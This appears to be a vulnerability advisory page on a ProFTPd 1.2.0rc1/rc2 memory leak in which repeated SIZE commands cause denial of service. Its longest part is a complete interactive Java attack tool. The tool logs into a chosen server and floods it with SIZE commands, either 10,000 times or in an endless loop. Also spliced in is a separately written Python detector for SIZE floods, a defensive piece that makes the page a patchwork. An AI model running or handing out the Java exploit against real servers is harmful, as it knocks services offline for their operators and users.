ProFTPd Remote Denial of Service Vulnerability (APP, flaw)

Source: Internet
Uploader: User
Affected programs:
ProFTPd
 
Description:
Memory leak in ProFTPd leading to a denial-of-service attack
 
Details:
ProFTPd is a very popular FTP server. A security vulnerability has been found in it that allows a malicious user to mount a denial-of-service attack against it.

When ProFTPd executes the SIZE FTP command it leaks memory. Sending roughly 5000 SIZE FTP commands to the server can cause ProFTPd to consume more than 300KB of memory, and sending still more SIZE commands results in denial of service.
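The leak described above is only visible if you look at how many SIZE commands a single session issues, since each one is a perfectly legal FTP command. The following detection script is an added example for this advisory, not code from the page or from the ProFTPd project: it parses a per-command log, counts SIZE commands per session, and flags sessions that exceed a threshold, estimating the leaked memory from the advisory's own figure of about 300KB per 5000 SIZE calls. The log line layout ("sess=... ip=... cmd=... arg=...") and the sample lines are constructed for the example and do not reflect any real ProFTPd log format.

```python
import re
from collections import defaultdict

# Advisory figure: roughly 5000 SIZE commands leak about 300 KB,
# i.e. about 61 bytes per call. Used only for a rough per-session estimate.
SIZE_LEAK_BYTES_PER_CALL = (300 * 1024) / 5000

# Hypothetical log line layout, constructed for this example (NOT a real ProFTPd format):
# "<ISO-timestamp> sess=<id> ip=<addr> cmd=<COMMAND> [arg=<argument>]"
LINE_RE = re.compile(
    r'^(?P<ts>\S+) sess=(?P<sess>\S+) ip=(?P<ip>\S+) cmd=(?P<cmd>\S+)(?: arg=(?P<arg>.*))?$'
)


def parse_line(line):
    """Parse one constructed log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["cmd"] = rec["cmd"].upper()  # FTP commands are case-insensitive
    return rec


def size_counts_per_session(lines):
    """Return {(session_id, client_ip): number of SIZE commands seen}."""
    counts = defaultdict(int)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["cmd"] == "SIZE":
            counts[(rec["sess"], rec["ip"])] += 1
    return dict(counts)


def flag_size_floods(lines, threshold=1000):
    """Sessions whose SIZE count exceeds the threshold, with the estimated leak in KiB."""
    findings = []
    for (sess, ip), n in sorted(size_counts_per_session(lines).items()):
        if n > threshold:
            findings.append({
                "session": sess,
                "ip": ip,
                "size_commands": n,
                "estimated_leak_kib": round(n * SIZE_LEAK_BYTES_PER_CALL / 1024, 1),
            })
    return findings


def build_sample_log():
    """Constructed sample: one ordinary session and one that hammers SIZE 5000 times."""
    lines = [
        "2001-01-01T10:00:00Z sess=a1 ip=192.0.2.10 cmd=USER arg=alice",
        "2001-01-01T10:00:01Z sess=a1 ip=192.0.2.10 cmd=PASS arg=****",
        "2001-01-01T10:00:02Z sess=a1 ip=192.0.2.10 cmd=SIZE arg=/pub/README",
        "2001-01-01T10:00:03Z sess=a1 ip=192.0.2.10 cmd=RETR arg=/pub/README",
        "2001-01-01T10:05:00Z sess=b7 ip=198.51.100.5 cmd=USER arg=bob",
        "2001-01-01T10:05:01Z sess=b7 ip=198.51.100.5 cmd=PASS arg=****",
    ]
    lines += ["2001-01-01T10:05:02Z sess=b7 ip=198.51.100.5 cmd=SIZE arg=/pub/README"
              for _ in range(5000)]
    lines.append("2001-01-01T10:06:00Z sess=b7 ip=198.51.100.5 cmd=QUIT")
    return lines


if __name__ == "__main__":
    for finding in flag_size_floods(build_sample_log()):
        print(finding)
```

The threshold is deliberately far above what a normal client needs (a few SIZE calls per transfer), so the rule keys on volume per session rather than on the command itself; on a real deployment the parser would be adapted to whatever command logging the server is configured to emit.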

The following code is provided solely for testing and researching this vulnerability; if you put it to improper use, you bear the consequences yourself.

import java.net.*;
import java.io.*;

// Thin wrapper around a TCP socket: line-oriented read and write.
class TCPconnection {

  private final int maxattempts = 5;
  private BufferedReader br;
  private PrintStream ps;

  public TCPconnection(String hostname, int portnumber) throws Exception {
    Socket s = doaSocket(hostname, portnumber);
    br = new BufferedReader(new InputStreamReader(s.getInputStream()));
    ps = new PrintStream(s.getOutputStream());
  }

  // Reads one line from the server; returns null once the server closes the stream.
  public String readLine() throws Exception {
    String s;
    try {
      s = br.readLine();
    } catch (IOException ioe) {
      System.out.println("TCP Error ... it's a little hax0r exception ;-)");
      throw new Exception("\nInput Error: I/O Error");
    }
    return s;
  }

  public void println(String s) {
    ps.println(s);
  }

  // Opens the socket, retrying up to maxattempts times on I/O errors.
  private Socket doaSocket(String hostname, int portnumber) throws Exception {
    Socket s = null;
    int attempts = 0;
    while (s == null && attempts < maxattempts) {
      try {
        s = new Socket(hostname, portnumber);
      } catch (UnknownHostException uhe) {
        System.err.println("It was not possible to establish the TCP connection.\n"
            + "Reason: unknown hostname " + hostname + ". Here is the Exception:");
        throw new Exception("\nConnection Error: unknown hostname");
      } catch (IOException ioe) {
        System.err.println("The connection was not accomplished due to an I/O Error: trying it again ...");
      }
      attempts++;
    }
    if (s == null) {
      throw new IOException("\nThe connection was not accomplished after " + maxattempts + " attempts.");
    }
    return s;
  }
}

class proftpDoS {

  public static void main(String[] arg) throws Exception {
    InputStreamReader isr;
    BufferedReader tcld;
    String hostnamez, username, password, file, s1, option;
    int i, j, k;
    isr = new InputStreamReader(System.in);
    tcld = new BufferedReader(isr);
    System.out.println("ProFTPd DoS by JeT-Li -The Wushu Master-");
    System.out.println("Code in an attempt to solve Fermat Last's Theoreme");

    // Interactive prompts: target host, credentials, and a file that exists on the server.
    hostnamez = "";
    while (hostnamez.length() == 0) {
      System.out.print("Please enter the hostname/IP: ");
      hostnamez = tcld.readLine();
    }
    username = "";
    while (username.length() == 0) {
      System.out.print("Enter the username: ");
      username = tcld.readLine();
    }
    password = "";
    while (password.length() == 0) {
      System.out.print("Enter the password for that username: ");
      password = tcld.readLine();
    }
    file = "";
    while (file.length() == 0) {
      System.out.print("Enter a valid filename on the FTP \n(with correct path of course ;-): ");
      file = tcld.readLine();
    }
    System.out.println("Choose one of these options; insert only the NUMBER, i.e.: 1");
    System.out.println("1) Request 10000 size's to the server (it may be enough)");
    System.out.println("2) \"No pain no gain\" (pseudo-eternal requests, ey it may be harm ;-P)");
    System.out.print("Option: ");
    option = tcld.readLine();
    k = Integer.parseInt(option);
    while (!(k == 1 || k == 2)) {
      System.out.print("Option not valid, please try again: ");
      option = tcld.readLine();
      k = Integer.parseInt(option);
    }

    // Log in, then issue the SIZE command repeatedly; each call leaks memory on vulnerable versions.
    TCPconnection tc = new TCPconnection(hostnamez, 21);
    tc.println("user " + username);
    tc.println("pass " + password);
    if (k == 1) {
      for (i = 0; i < 10000; i++)
        tc.println("size " + file);
    } else if (k == 2) {
      // The inner bound grows with j itself, so this loop effectively never terminates.
      for (i = 1; i < 100; i++)
        for (j = 2; j < ((int) Math.pow(j, i)); j++)
          tc.println("size " + file);
    }
    tc.println("quit");

    // Drain the server's responses until it closes the connection.
    s1 = tc.readLine();
    while (s1 != null) {
      s1 = tc.readLine();
    }
    System.out.println("Attack completed ... as one of my friends says:");
    System.out.println("Hack just r0cks ;-)");
  }
}

Affected systems:
ProFTPd 1.2.0rc1
ProFTPd 1.2.0rc2
 
Solution:
CNNS provides you with comprehensive network security services.
